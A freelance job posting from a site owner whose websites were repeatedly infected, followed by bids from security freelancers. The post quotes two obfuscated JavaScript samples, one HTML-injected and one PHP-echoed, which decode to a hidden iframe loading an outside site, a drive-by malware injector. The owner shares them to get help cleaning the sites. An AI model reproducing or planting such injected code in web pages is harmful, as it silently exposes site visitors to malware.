Encerrado

Website got attcked: need security analyst

Hi,

this is the second time that happened after changing hosting provider twice and i'm sure that thousands of people got effected.

All of our websites got infected with this kind of code which is beeing injected in all [url removed, login to view], [url removed, login to view] and index.html. when the file is in htm format, the code is injected between the head tag and the body and looks like this:

<script type="text/javascript">var cOTtEtyFSFfjldSGegJo = "lAOY60lAOY105lAOY102lAOY114lAOY97lAOY109lAOY101lA OY32lAOY119lAOY105lAOY100lAOY116lAOY104lAOY61lAOY3 4lAOY52lAOY56lAOY48lAOY34lAOY32lAOY104lAOY101lAOY1 05lAOY103lAOY104lAOY116lAOY61lAOY34lAOY54lAOY48lAO Y34lAOY32lAOY115lAOY114lAOY99lAOY61lAOY34lAOY104lA OY116lAOY116lAOY112lAOY58lAOY47lAOY47lAOY116lAOY11 4lAOY97lAOY102lAOY102lAOY105lAOY99lAOY115lAOY45lAO Y105lAOY110lAOY115lAOY112lAOY101lAOY99lAOY116lAOY1 11lAOY114lAOY46lAOY99lAOY110lAOY47lAOY100lAOY97lAO Y105lAOY108lAOY121lAOY95lAOY115lAOY116lAOY97lAOY11 6lAOY115lAOY47lAOY105lAOY110lAOY46lAOY99lAOY103lAO Y105lAOY63lAOY52lAOY34lAOY32lAOY115lAOY116lAOY121l AOY108lAOY101lAOY61lAOY34lAOY98lAOY111lAOY114lAOY1 00lAOY101lAOY114lAOY58lAOY48lAOY112lAOY120lAOY59lA OY32lAOY112lAOY111lAOY115lAOY105lAOY116lAOY105lAOY 111lAOY110lAOY58lAOY114lAOY101lAOY108lAOY97lAOY116 lAOY105lAOY118lAOY101lAOY59lAOY32lAOY116lAOY111lAO Y112lAOY58lAOY48lAOY112lAOY120lAOY59lAOY32lAOY108l AOY101lAOY102lAOY116lAOY58lAOY45lAOY53lAOY48lAOY48 lAOY112lAOY120lAOY59lAOY32lAOY111lAOY112lAOY97lAOY 99lAOY105lAOY116lAOY121lAOY58lAOY48lAOY59lAOY32lAO Y102lAOY105lAOY108lAOY116lAOY101lAOY114lAOY58lAOY1 12lAOY114lAOY111lAOY103lAOY105lAOY100lAOY58lAOY68l AOY88lAOY73lAOY109lAOY97lAOY103lAOY101lAOY84lAOY11 4lAOY97lAOY110lAOY115lAOY102lAOY111lAOY114lAOY109l AOY46lAOY77lAOY105lAOY99lAOY114lAOY111lAOY115lAOY1 11lAOY102lAOY116lAOY46lAOY65lAOY108lAOY112lAOY104l AOY97lAOY40lAOY111lAOY112lAOY97lAOY99lAOY105lAOY11 6lAOY121lAOY61lAOY48lAOY41lAOY59lAOY32lAOY45lAOY10 9lAOY111lAOY122lAOY45lAOY111lAOY112lAOY97lAOY99lAO Y105lAOY116lAOY121lAOY58lAOY48lAOY34lAOY62lAOY60lA OY47lAOY105lAOY102lAOY114lAOY97lAOY109lAOY101lAOY6 2";var aRaKwtvZBKReZlYeeWkx = [url removed, login to view]("lAOY");var cPgNszUXgdMGvmQsgMRi = "";for (var XjMxUkbzHLxjaexTdRrJ=1; XjMxUkbzHLxjaexTdRrJ<[url removed, login to view]; XjMxUkbzHLxjaexTdRrJ++){cPgNszUXgdMGvmQsgMRi+=Stri [url removed, login to view](aRaKwtvZBKReZlYeeWkx[XjMxUkbzHLxjaexTdRrJ]);}var BvcYOhYUIDCJXNobcdEr = ""+cPgNszUXgdMGvmQsgMRi+"";[url removed, login to view](""+BvcYO hYUIDCJXNobcdEr+"")</script>

when the file is in php, the code is injected at the footer of the page and looks like this:

<?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo '<script type="text/javascript">var gtksvgWworhhokczySZM = "XEm60XEm105XEm102XEm114XEm97XEm109XEm101XEm32XEm1 19XEm105XEm100XEm116XEm104XEm61XEm34XEm52XEm56XEm4 8XEm34XEm32XEm104XEm101XEm105XEm103XEm104XEm116XEm 61XEm34XEm54XEm48XEm34XEm32XEm115XEm114XEm99XEm61X Em34XEm104XEm116XEm116XEm112XEm58XEm47XEm47XEm116X Em114XEm97XEm102XEm102XEm105XEm99XEm115XEm45XEm105 XEm110XEm115XEm112XEm101XEm99XEm116XEm111XEm114XEm 46XEm99XEm110XEm47XEm100XEm97XEm105XEm108XEm121XEm 95XEm115XEm116XEm97XEm116XEm115XEm47XEm105XEm110XE m46XEm99XEm103XEm105XEm63XEm51XEm34XEm32XEm115XEm1 16XEm121XEm108XEm101XEm61XEm34XEm98XEm111XEm114XEm 100XEm101XEm114XEm58XEm48XEm112XEm120XEm59XEm32XEm 112XEm111XEm115XEm105XEm116XEm105XEm111XEm110XEm58 XEm114XEm101XEm108XEm97XEm116XEm105XEm118XEm101XEm 59XEm32XEm116XEm111XEm112XEm58XEm48XEm112XEm120XEm 59XEm32XEm108XEm101XEm102XEm116XEm58XEm45XEm53XEm4 8XEm48XEm112XEm120XEm59XEm32XEm111XEm112XEm97XEm99 XEm105XEm116XEm121XEm58XEm48XEm59XEm32XEm102XEm105 XEm108XEm116XEm101XEm114XEm58XEm112XEm114XEm111XEm 103XEm105XEm100XEm58XEm68XEm88XEm73XEm109XEm97XEm1 03XEm101XEm84XEm114XEm97XEm110XEm115XEm102XEm111XE m114XEm109XEm46XEm77XEm105XEm99XEm114XEm111XEm115X Em111XEm102XEm116XEm46XEm65XEm108XEm112XEm104XEm97 XEm40XEm111XEm112XEm97XEm99XEm105XEm116XEm121XEm61 XEm48XEm41XEm59XEm32XEm45XEm109XEm111XEm122XEm45XE m111XEm112XEm97XEm99XEm105XEm116XEm121XEm58XEm48XE m34XEm62XEm60XEm47XEm105XEm102XEm114XEm97XEm109XEm 101XEm62";var eMFMDzBPQAHxusppYMmM = [url removed, login to view]("XEm");var DTtsEVsCoRPTdUfhThxk = "";for (var iEhcxXRVjEhnYbgcxYfm=1; iEhcxXRVjEhnYbgcxYfm<[url removed, login to view]; iEhcxXRVjEhnYbgcxYfm++){DTtsEVsCoRPTdUfhThxk+=Stri [url removed, login to view](eMFMDzBPQAHxusppYMmM[iEhcxXRVjEhnYbgcxYfm]);}[url removed, login to view](DTtsEVsCoRPTdUfhThxk)</script>'; ?>

The strangest thing is that it infected all of our websites which are hosted on different accounts with different passwords. this happened when we were hosted with lunarpages. now we moved to hostmonster and another company. 5 differetn hosting packages, with 2 different hosting companies, so completely different websites, and they all got infected. and some are just HTML with no scripting on the page. some index pages were "under construction pages".

this is very seroius as this code infects users when they visit our website, and google already marked our website as harmful in the search results. any help would be really appreaciated.

Regards,

Sami Baddar

Habilidades: Segurança na rede

Ver mais: cottetyfsffjldsgegjo, website security analyst, dttsevscorptdufhthxk, var cottetyfsffjldsgegjo, sami baddar, bvcyohyuidcjxnobcder, script typetextjavascript var cottetyfsffjldsgegjo, write to ng, website format help, split page html, need format, lunarpages, lt security, IT analyst, head of security, security analyst websites, virus php echo script documentwrite, php echo php echo php echo, need security web site, php echo script typetextjavascript var var index virus, var gtksvgwworhhokczyszm malware, security tracker, php echo php echo php echo php echo, php echo script typetextjavascript var cottetyfsffjldsgegjo, cpgnszuxgdmgvmqsgmri

Acerca do Empregador:
( 30 comentários ) Swieqi, Malta

ID do Projeto: #438471

18 freelancers are bidding on average $145 for this job

musashi42

Hi, I am very interested in this job position. Please check my profile for references and reviews, and Your PM for more details. Thank You.

$50 USD em 1 dia
(31 Comentários)
6.3
Nick1

Certified Linux System Administrator and Security Advisor ready to work. I can start right away. Regards. Nick.

$200 USD in 0 dias
(46 Comentários)
5.3
crajeshbe

Hi Good day, Web hacker bid. Expert in Virus and Malware management. Please check PM and my reviews. Regards [url removed, login to view] B.E

$250 USD in 4 dias
(22 Comentários)
5.2
visu14

Hi.. Am Expert in web security.. Please check PM...

$210 USD in 5 dias
(9 Comentários)
4.2
value4u

Hi, please check my PM. Thank you.

$100 USD in 0 dias
(7 Comentários)
4.2
ichurakov

Please check PM. Thnx.

$30 USD in 0 dias
(21 Comentários)
4.0
keithn

Hello, I'll be contacting you via PM.

$130 USD in 5 dias
(5 Comentários)
3.0
marcinzygmunt

Sir I know what is the reason. I know the solution so I feel am the correct person. I have a nice profie at other freelancing page. [url removed, login to view] Mais

$100 USD em 1 dia
(4 Comentários)
2.8
pruffin

I am a CISSP and have over 20 years in computer security and 30 yrs as an IT consultant and professional. I have solved and fixed similar problems with compromised scripts and servers.

$150 USD in 2 dias
(1 Comentário)
1.6
atifmajid

PHP Security Expert. Read PMB for more details

$200 USD in 5 dias
(0 Comentários)
0.0
kiran4linux

this is a common iframe attack..Please

$50 USD em 1 dia
(0 Comentários)
0.0
asynk

I'm a professional penetration tester (ethical hacker) that has been doing this exact work--and only this work--for 11 years. I will do the work and provide a write-up when done. I realize I am not the cheapest bid, bu Mais

$250 USD em 1 dia
(0 Comentários)
0.0
blex

Hi, it will be nice to complete this project ;)

$97 USD in 2 dias
(0 Comentários)
0.0
subha83

i'll make your site completely hacker safe and no further attack in [url removed, login to view] is better than [url removed, login to view] my profile

$100 USD in 2 dias
(0 Comentários)
0.0
AkashISS

Hi. I can carry out this project for you. Please visit my profile and have a look. If you feel comfortable, please reply me so that we can take this further. Thanks. Regards, Akash...

$250 USD in 5 dias
(0 Comentários)
0.0
Techhep4me

I just removed this virus off of another web site, and took measures to keep it from happening again.

$150 USD in 2 dias
(0 Comentários)
0.0
egibby

Hi my name is Eric Gibson. I am a programmer and system administrator with over 10 years of experience. I'm a native English speaker, and have extensive experience in the skills necessary to complete your project. I ca Mais

$50 USD em 1 dia
(0 Comentários)
0.0
musaulker

Hello, I'm working as a security consultant for large and mid-size private companies. I have great knowledge and experience on web security, system security, penetration tests, security analysis etc. I can provide you Mais

$250 USD in 0 dias
(0 Comentários)
0.0